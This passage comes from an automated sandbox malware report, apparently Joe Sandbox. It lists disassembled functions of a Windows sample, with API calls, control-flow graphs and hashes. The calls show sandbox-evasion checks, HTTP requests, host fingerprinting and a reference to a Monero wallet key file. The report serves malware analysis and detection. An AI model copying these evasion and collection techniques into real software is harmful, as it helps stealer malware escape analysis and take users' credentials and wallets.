                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00C5A5F1
                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00C5A607
                        • GetProcAddress.KERNEL32(75AF0000,0089F050), ref: 00C5A629
                        • GetProcAddress.KERNEL32(75AF0000,0089AD98), ref: 00C5A641
                        • GetProcAddress.KERNEL32(75AF0000,0089F080), ref: 00C5A659
                        • GetProcAddress.KERNEL32(75AF0000,0089F170), ref: 00C5A672
                        • GetProcAddress.KERNEL32(75D90000,008879F0), ref: 00C5A693
                        • GetProcAddress.KERNEL32(6E330000,0089F188), ref: 00C5A6B4
                        • GetProcAddress.KERNEL32(6E330000,00887A10), ref: 00C5A6CD
                        • GetProcAddress.KERNEL32(6E330000,0089F0B0), ref: 00C5A6E5
                        • GetProcAddress.KERNEL32(6E330000,0089F1A0), ref: 00C5A6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: ef27e421e54663214de7e9d7538c81bbb6db14eec4e277ff38f6de8132ece91a
                        • Instruction ID: ced994902c8498f99a8efb9be2a333ac2f28b0672ad915bbafdc84c7c0171f04
                        • Opcode Fuzzy Hash: ef27e421e54663214de7e9d7538c81bbb6db14eec4e277ff38f6de8132ece91a
                        • Instruction Fuzzy Hash: BF623EB5500600AFF348DFAAED8895637F9F74C70171C853BA60DE3234D63A945AEB22
                        Function 00C46280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1033 c46280-c4630b call c5a7a0 call c447b0 call c5a740 InternetOpenA StrCmpCA 1040 c46314-c46318 1033->1040 1041 c4630d 1033->1041 1042 c4631e-c46342 InternetConnectA 1040->1042 1043 c46509-c46525 call c5a7a0 call c5a800 * 2 1040->1043 1041->1040 1044 c464ff-c46503 InternetCloseHandle 1042->1044 1045 c46348-c4634c 1042->1045 1061 c46528-c4652d 1043->1061 1044->1043 1047 c4634e-c46358 1045->1047 1048 c4635a 1045->1048 1051 c46364-c46392 HttpOpenRequestA 1047->1051 1048->1051 1053 c464f5-c464f9 InternetCloseHandle 1051->1053 1054 c46398-c4639c 1051->1054 1053->1044 1056 c463c5-c46405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 c4639e-c463bf InternetSetOptionA 1054->1057 1059 c46407-c46427 call c5a740 call c5a800 * 2 1056->1059 1060 c4642c-c4644b call c58940 1056->1060 1057->1056 1059->1061 1067 c4644d-c46454 1060->1067 1068 c464c9-c464e9 call c5a740 call c5a800 * 2 1060->1068 1071 c46456-c46480 InternetReadFile 1067->1071 1072 c464c7-c464ef InternetCloseHandle 1067->1072 1068->1061 1076 c46482-c46489 1071->1076 1077 c4648b 1071->1077 1072->1053 1076->1077 1080 c4648d-c464c5 call c5a9b0 call c5a8a0 call c5a800 1076->1080 1077->1072 1080->1071
                        APIs
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C44839
                          • Part of subcall function 00C447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C44849
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • InternetOpenA.WININET(00C60DFE,00000001,00000000,00000000,00000000), ref: 00C462E1
                        • StrCmpCA.SHLWAPI(?,008A0610), ref: 00C46303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C46335
                        • HttpOpenRequestA.WININET(00000000,GET,?,0089FCA0,00000000,00000000,00400100,00000000), ref: 00C46385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C463BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C463D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00C463FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C4646D
                        • InternetCloseHandle.WININET(00000000), ref: 00C464EF
                        • InternetCloseHandle.WININET(00000000), ref: 00C464F9
                        • InternetCloseHandle.WININET(00000000), ref: 00C46503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: 7479fe20c364f97fd262a44763f00c65637a71ea2795479b2c64dd0bc6695abc
                        • Instruction ID: 0f50684c529cc9927914b4652e0b9a816357883b8166b0cb662c01fba988624b
                        • Opcode Fuzzy Hash: 7479fe20c364f97fd262a44763f00c65637a71ea2795479b2c64dd0bc6695abc
                        • Instruction Fuzzy Hash: 4C717D75A00208AFEB24DFA1CC49BEE7774BB04701F108169F5096B1D4DBB46A89DF52
                        Function 00C55510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1090 c55510-c55577 call c55ad0 call c5a820 * 3 call c5a740 * 4 1106 c5557c-c55583 1090->1106 1107 c55585-c555b6 call c5a820 call c5a7a0 call c41590 call c551f0 1106->1107 1108 c555d7-c5564c call c5a740 * 2 call c41590 call c552c0 call c5a8a0 call c5a800 call c5aad0 StrCmpCA 1106->1108 1123 c555bb-c555d2 call c5a8a0 call c5a800 1107->1123 1134 c55693-c556a9 call c5aad0 StrCmpCA 1108->1134 1138 c5564e-c5568e call c5a7a0 call c41590 call c551f0 call c5a8a0 call c5a800 1108->1138 1123->1134 1139 c557dc-c55844 call c5a8a0 call c5a820 * 2 call c41670 call c5a800 * 4 call c56560 call c41550 1134->1139 1140 c556af-c556b6 1134->1140 1138->1134 1271 c55ac3-c55ac6 1139->1271 1142 c556bc-c556c3 1140->1142 1143 c557da-c5585f call c5aad0 StrCmpCA 1140->1143 1146 c556c5-c55719 call c5a820 call c5a7a0 call c41590 call c551f0 call c5a8a0 call c5a800 1142->1146 1147 c5571e-c55793 call c5a740 * 2 call c41590 call c552c0 call c5a8a0 call c5a800 call c5aad0 StrCmpCA 1142->1147 1161 c55865-c5586c 1143->1161 1162 c55991-c559f9 call c5a8a0 call c5a820 * 2 call c41670 call c5a800 * 4 call c56560 call c41550 1143->1162 1146->1143 1147->1143 1250 c55795-c557d5 call c5a7a0 call c41590 call c551f0 call c5a8a0 call c5a800 1147->1250 1168 c55872-c55879 1161->1168 1169 c5598f-c55a14 call c5aad0 StrCmpCA 1161->1169 1162->1271 1175 c558d3-c55948 call c5a740 * 2 call c41590 call c552c0 call c5a8a0 call c5a800 call c5aad0 StrCmpCA 1168->1175 1176 c5587b-c558ce call c5a820 call c5a7a0 call c41590 call c551f0 call c5a8a0 call c5a800 1168->1176 1198 c55a16-c55a21 Sleep 1169->1198 1199 c55a28-c55a91 call c5a8a0 call c5a820 * 2 call c41670 call c5a800 * 4 call c56560 call c41550 1169->1199 1175->1169 1274 c5594a-c5598a call c5a7a0 call c41590 call c551f0 call c5a8a0 call c5a800 1175->1274 1176->1169 1198->1106 1199->1271 1250->1143 1274->1169
                        APIs
                          • Part of subcall function 00C5A820: lstrlen.KERNEL32(00C44F05,?,?,00C44F05,00C60DDE), ref: 00C5A82B
                          • Part of subcall function 00C5A820: lstrcpy.KERNEL32(00C60DDE,00000000), ref: 00C5A885
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C55644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C556A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C55857
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C55228
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C55318
                          • Part of subcall function 00C552C0: lstrlen.KERNEL32(00000000), ref: 00C5532F
                          • Part of subcall function 00C552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00C55364
                          • Part of subcall function 00C552C0: lstrlen.KERNEL32(00000000), ref: 00C55383
                          • Part of subcall function 00C552C0: lstrlen.KERNEL32(00000000), ref: 00C553AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C5578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C55940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C55A0C
                        • Sleep.KERNEL32(0000EA60), ref: 00C55A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: e986695314c55e7c2900d388c513eec30574f3605f94cc994e01864c2180e396
                        • Instruction ID: 897d2ddab0c05c3174c286184e50bd24ff33c8b070e78b1e6866476db54e92c5
                        • Opcode Fuzzy Hash: e986695314c55e7c2900d388c513eec30574f3605f94cc994e01864c2180e396
                        • Instruction Fuzzy Hash: 22E176759101049ADB14FBB2DC96AED7338BF54341F548228BD07620D1EF346B8DEBA6
                        Function 00C517A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1301 c517a0-c517cd call c5aad0 StrCmpCA 1304 c517d7-c517f1 call c5aad0 1301->1304 1305 c517cf-c517d1 ExitProcess 1301->1305 1309 c517f4-c517f8 1304->1309 1310 c519c2-c519cd call c5a800 1309->1310 1311 c517fe-c51811 1309->1311 1312 c51817-c5181a 1311->1312 1313 c5199e-c519bd 1311->1313 1315 c51821-c51830 call c5a820 1312->1315 1316 c518ad-c518be StrCmpCA 1312->1316 1317 c518cf-c518e0 StrCmpCA 1312->1317 1318 c5198f-c51999 call c5a820 1312->1318 1319 c51849-c51858 call c5a820 1312->1319 1320 c51835-c51844 call c5a820 1312->1320 1321 c518f1-c51902 StrCmpCA 1312->1321 1322 c51951-c51962 StrCmpCA 1312->1322 1323 c51970-c51981 StrCmpCA 1312->1323 1324 c51913-c51924 StrCmpCA 1312->1324 1325 c51932-c51943 StrCmpCA 1312->1325 1326 c5185d-c5186e StrCmpCA 1312->1326 1327 c5187f-c51890 StrCmpCA 1312->1327 1313->1309 1315->1313 1329 c518c0-c518c3 1316->1329 1330 c518ca 1316->1330 1331 c518e2-c518e5 1317->1331 1332 c518ec 1317->1332 1318->1313 1319->1313 1320->1313 1333 c51904-c51907 1321->1333 1334 c5190e 1321->1334 1339 c51964-c51967 1322->1339 1340 c5196e 1322->1340 1342 c51983-c51986 1323->1342 1343 c5198d 1323->1343 1335 c51926-c51929 1324->1335 1336 c51930 1324->1336 1337 c51945-c51948 1325->1337 1338 c5194f 1325->1338 1348 c51870-c51873 1326->1348 1349 c5187a 1326->1349 1350 c51892-c5189c 1327->1350 1351 c5189e-c518a1 1327->1351 1329->1330 1330->1313 1331->1332 1332->1313 1333->1334 1334->1313 1335->1336 1336->1313 1337->1338 1338->1313 1339->1340 1340->1313 1342->1343 1343->1313 1348->1349 1349->1313 1352 c518a8 1350->1352 1351->1352 1352->1313
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00C517C5
                        • ExitProcess.KERNEL32 ref: 00C517D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: a08cf7772107246c31d94a2e5100037783b96e65e4b194047361c654e6a7431e
                        • Instruction ID: ec9328ea0d4c5e30a2f210b7e508fec60569b401fdd0a3c13a1c73aa5f015953
                        • Opcode Fuzzy Hash: a08cf7772107246c31d94a2e5100037783b96e65e4b194047361c654e6a7431e
                        • Instruction Fuzzy Hash: 175191B8A00209EFDB14DFA2C958BBE77B5BF44305F184159EC0677280D770EA89DB66
                        Function 00C57500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1356 c57500-c5754a GetWindowsDirectoryA 1357 c57553-c575c7 GetVolumeInformationA call c58d00 * 3 1356->1357 1358 c5754c 1356->1358 1365 c575d8-c575df 1357->1365 1358->1357 1366 c575e1-c575fa call c58d00 1365->1366 1367 c575fc-c57617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 c57619-c57626 call c5a740 1367->1369 1370 c57628-c57658 wsprintfA call c5a740 1367->1370 1377 c5767e-c5768e 1369->1377 1370->1377
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00C57542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C5757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C57603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C5760A
                        • wsprintfA.USER32 ref: 00C57640
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\
                        • API String ID: 1544550907-3809124531
                        • Opcode ID: 2c9e08e94af8f96f64654a38b89f2be5aa2337b58e94854e002f2c00c34eea1b
                        • Instruction ID: 658903dd11696745c8c6f35e3719432829a7ae6b7f510ddbf36c5de16b9103b0
                        • Opcode Fuzzy Hash: 2c9e08e94af8f96f64654a38b89f2be5aa2337b58e94854e002f2c00c34eea1b
                        • Instruction Fuzzy Hash: 384184B5D04248AFDB10DF94DC45BDEBBB8AF08701F140199F90977280EB796A88CBA5
                        Function 00C569F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00894178), ref: 00C598A1
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,008940E8), ref: 00C598BA
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00894130), ref: 00C598D2
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,008941C0), ref: 00C598EA
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,008941D8), ref: 00C59903
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,0089ADE8), ref: 00C5991B
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,008876D0), ref: 00C59933
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,008876F0), ref: 00C5994C
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00893F98), ref: 00C59964
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00893FE0), ref: 00C5997C
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00894028), ref: 00C59995
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00893FB0), ref: 00C599AD
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00887650), ref: 00C599C5
                          • Part of subcall function 00C59860: GetProcAddress.KERNEL32(74DD0000,00894058), ref: 00C599DE
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C411D0: ExitProcess.KERNEL32 ref: 00C41211
                          • Part of subcall function 00C41160: GetSystemInfo.KERNEL32(?), ref: 00C4116A
                          • Part of subcall function 00C41160: ExitProcess.KERNEL32 ref: 00C4117E
                          • Part of subcall function 00C41110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C4112B
                          • Part of subcall function 00C41110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00C41132
                          • Part of subcall function 00C41110: ExitProcess.KERNEL32 ref: 00C41143
                          • Part of subcall function 00C41220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C4123E
                          • Part of subcall function 00C41220: __aulldiv.LIBCMT ref: 00C41258
                          • Part of subcall function 00C41220: __aulldiv.LIBCMT ref: 00C41266
                          • Part of subcall function 00C41220: ExitProcess.KERNEL32 ref: 00C41294
                          • Part of subcall function 00C56770: GetUserDefaultLangID.KERNEL32 ref: 00C56774
                          • Part of subcall function 00C41190: ExitProcess.KERNEL32 ref: 00C411C6
                          • Part of subcall function 00C57850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C411B7), ref: 00C57880
                          • Part of subcall function 00C57850: RtlAllocateHeap.NTDLL(00000000), ref: 00C57887
                          • Part of subcall function 00C57850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C5789F
                          • Part of subcall function 00C578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C57910
                          • Part of subcall function 00C578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C57917
                          • Part of subcall function 00C578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C5792F
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0089ADD8,?,00C6110C,?,00000000,?,00C61110,?,00000000,00C60AEF), ref: 00C56ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C56AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00C56AF9
                        • Sleep.KERNEL32(00001770), ref: 00C56B04
                        • CloseHandle.KERNEL32(?,00000000,?,0089ADD8,?,00C6110C,?,00000000,?,00C61110,?,00000000,00C60AEF), ref: 00C56B1A
                        • ExitProcess.KERNEL32 ref: 00C56B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: 084cd1cc710ed6bf3a1e57903816a1c4be6800fd7823222c1f006a02ab53ad18
                        • Instruction ID: adb397ce9c8a4a9ab787971c3e1979085703c18e8892a38caeaa3eac417e72f1
                        • Opcode Fuzzy Hash: 084cd1cc710ed6bf3a1e57903816a1c4be6800fd7823222c1f006a02ab53ad18
